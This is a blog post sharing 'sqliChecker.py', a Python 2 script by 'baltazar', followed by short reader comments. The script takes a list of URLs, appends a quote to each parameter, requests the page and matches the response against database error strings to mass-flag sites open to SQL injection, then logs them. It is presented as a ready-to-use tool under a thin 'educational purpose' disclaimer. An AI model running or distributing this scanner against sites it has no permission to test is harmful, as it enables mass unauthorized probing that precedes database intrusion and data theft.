sqliChecker it's a mass list sqli vulnerabilty checker who detect vuln sites from a text file in multiple database types like Mysql, Mssql, Msaccess, Oracle. Automaticly remove duplicated sites.
Simple script and easy to use.
python sqliChecker.py vulnlistfile.txt
or direct link from pastebin http://pastebin.com/raw.php?i=jA7wrWw1#!/usr/bin/python # This was written for educational purpose and pentest only. Use it at your own risk. # Author will be not responsible for any damage! # !!! Special greetz for my friend sinner_01 !!! # Toolname : sqliChecker.py # Coder : baltazar a.k.a b4ltazar < b4ltazar@gmail.com> # Version : 0.1 # Greetz for rsauron and low1z, great python coders # greetz for d3hydr8, r45c4l, qk, fx0, Soul, MikiSoft, c0ax, b0ne, tek0t and all members of ex darkc0de.com, ljuska.org # import os, sys, subprocess, socket, urllib2, re, time try: set except NameError: from sets import Set as set def timer(): sec = time.time() return sec def logo(): print "\n|---------------------------------------------------------------|" print "| b4ltazar[@]gmail[dot]com |" print "| 05/2012 sqliChecker.py v.0.1 |" print "| b4ltazar.wordpress.com & ljuska.org |" print "| |" print "|---------------------------------------------------------------|\n" if sys.platform == 'linux' or sys.platform == 'linux2': subprocess.call("clear", shell=True) logo() else: subprocess.call("cls", shell=True) logo() timeout = 10 socket.setdefaulttimeout(timeout) log = "sqlivuln.txt" logfile = open(log, "a") urls = [] vuln = [] sqlerrors = {'MySQL': 'error in your SQL syntax', 'MiscError': 'mysql_fetch', 'MiscError2': 'num_rows', 'Oracle': 'ORA-01756', 'JDBC_CFM': 'Error Executing Database Query', 'JDBC_CFM2': 'SQLServer JDBC Driver', 'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server', 'MSSQL_Uqm': 'Unclosed quotation mark', 'MS-Access_ODBC': 'ODBC Microsoft Access Driver', 'MS-Access_JETdb': 'Microsoft JET Database', 'Error Occurred While Processing Request' : 'Error Occurred While Processing Request', 'Server Error' : 'Server Error', 'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error', 'Invalid Querystring' : 'Invalid Querystring', 'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC', 'VBScript Runtime' : 'VBScript Runtime', 'ADODB.Field' : 'ADODB.Field', 'BOF or EOF' : 'BOF or EOF', 'ADODB.Command' : 'ADODB.Command', 'JET Database' : 'JET Database', 'mysql_fetch_array()' : 'mysql_fetch_array()', 'Syntax error' : 'Syntax error', 'mysql_numrows()' : 'mysql_numrows()', 'GetArray()' : 'GetArray()', 'FetchRow()' : 'FetchRow()', 'Input string was not in a correct format' : 'Input string was not in a correct format'} if len(sys.argv) != 2: print "[+] Usage: python sqliChecker.py" print "[+] Please visit ljuska.org & b4ltazar.wordpress.com" print "[!] Exiting, thanks for using script" sys.exit(1) checklist = sys.argv[1] starttimer = timer() try: check = open(checklist, "r") checkline = check.readlines() print "[!] You have",len(checkline),"links to check\n" except(IOError): print "[-] Error, check your path or file name!" print "[+] Please visit ljuska.org & b4ltazar.wordpress.com" print "[!] Exiting, thanks for using script" sys.exit(1) for url in checkline: url = url.replace("\n", "") url = url.rsplit('=', 1)[0]+"=" url = url+"'" urls.append(url) def classicINJ(url): num = 1 for url in urls: try: source = urllib2.urlopen(url).read() for type,eMSG in sqlerrors.items(): if re.search(eMSG, source): print num,"/",len(urls), "w00t!,w00t!:", url, "Error:", type, " ---> SQL Injection Found" vuln.append(url) else: pass except: pass num += 1 if __name__ == "__main__": classicINJ(url) print "\n[!] There is %s vulnerable sites to SQL Injection" % len(vuln) vulnerable = list(set(vuln)) print "[+] Without duplicates we have %s vulnerable sites to SQL Injection" % len(vulnerable) for v in vulnerable: logfile.write("\n"+v) endtimer = timer() print "\n[+] Time used for checking :", int(((endtimer-starttimer) / 60)), "minutes" print "[+] Average time per link is :", int(((endtimer-starttimer) / float(len(checkline)))), "seconds" print "[+] Please visit ljuska.org & b4ltazar.wordpress.com"
thanks to baltazar for this script
3 comments:
how to fix
[URL=http://imageshack.us/photo/my-images/822/99380356.gif/][IMG]http://img822.imageshack.us/img822/3277/99380356.gif[/IMG][/URL]
Uploaded with [URL=http://imageshack.us]ImageShack.us[/URL]
Check this one, coz was an warong at line 25 with /n new line..
http://pastebin.com/PQCnjkFM
this is another version :
http://h4ckhouse.blogspot.com/2012/10/pythonauto-sql-finder-v1-googlebingip.html
Post a Comment